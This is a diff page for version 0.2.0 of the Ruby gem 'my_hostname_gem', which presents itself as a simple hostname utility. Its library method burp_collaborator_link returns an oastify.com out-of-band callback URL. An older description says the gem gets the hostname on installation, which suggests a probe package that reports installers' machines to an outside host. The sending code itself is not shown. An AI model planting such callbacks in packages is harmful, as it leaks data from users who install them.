my_hostname_gem 0.1.0 → 0.2.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/lib/my_hostname_gem.rb +1 -1
  3. metadata +5 -7
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: edb9138291eba0ce6e9da585d7c2ece2e544afa05a1a6f0522bd6a86735bae43
4
- data.tar.gz: 8ab68fc5721187079833b7ebf205977c23d96eaeb361b5cca0158ba81f7d9943
3
+ metadata.gz: 6bcb4ef7fa4f626423f5b0672f6a38c95350f2eddad56aa2cacc4bc1a213f8d7
4
+ data.tar.gz: 41da522d9549ca1ed5693fa7dd608c7cbe3848774309173f4c60a813aad23427
5
5
  SHA512:
6
- metadata.gz: c2869a755d92f0bf07631aacecc1abe9590a01137f42222fe91c6ce1bb35c40d92629258b543418fd24f5981867bdcf7a09190315a5c06e2bcf89c85dac31991
7
- data.tar.gz: 391a4146a6cc831534111562827b9c341871b95f26c089ebea842b80593cbcc4762197396cc28eee7a79cab3ba83474ac6f7174a8a89c9fcb51e3a7394559bf8
6
+ metadata.gz: 95787465a5ee023b631007b71d4188a8c3935df53a1b67ea8b7767db6715c7997a06c0b3d3124b23bc427b920e88a001bd40397032744f57b518b13390fee177
7
+ data.tar.gz: e609ba27658e9b5ef18b015a654fc31814397a0b4dc1d6e221f583a7c0738ce561a961febeb76d51f8d59f6437d96dbb0b60e4feeb52f8ce336ae493d6bc5eb4
@@ -7,6 +7,6 @@ module MyHostnameGem
7
7
 
8
8
  def self.burp_collaborator_link
9
9
  # Modify the URL to your Burp Collaborator link
10
- "m4rh16lxe0whysi4uu8jsp0ej5pvdk.oastify.com"
10
+ "http://m4rh16lxe0whysi4uu8jsp0ej5pvdk.oastify.com"
11
11
  end
12
12
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: my_hostname_gem
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.0
4
+ version: 0.2.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Monika Talekar
@@ -24,9 +24,8 @@ dependencies:
24
24
  - - ">="
25
25
  - !ruby/object:Gem::Version
26
26
  version: '0'
27
- description: 'A simple Ruby gem that retrieves the hostname of the machine upon installation.
28
-
29
- '
27
+ description: This gem provides a simple method to retrieve the hostname of the current
28
+ system.
30
29
  email: monikatalekar@gmail.com
31
30
  executables: []
32
31
  extensions: []
@@ -36,8 +35,7 @@ files:
36
35
  homepage:
37
36
  licenses:
38
37
  - MIT
39
- metadata:
40
- allowed_push_host: https://rubygems.org
38
+ metadata: {}
41
39
  post_install_message:
42
40
  rdoc_options: []
43
41
  require_paths:
@@ -56,5 +54,5 @@ requirements: []
56
54
  rubygems_version: 3.3.15
57
55
  signing_key:
58
56
  specification_version: 4
59
- summary: Retrieve the hostname of the machine
57
+ summary: A simple Ruby gem to get the hostname.
60
58
  test_files: []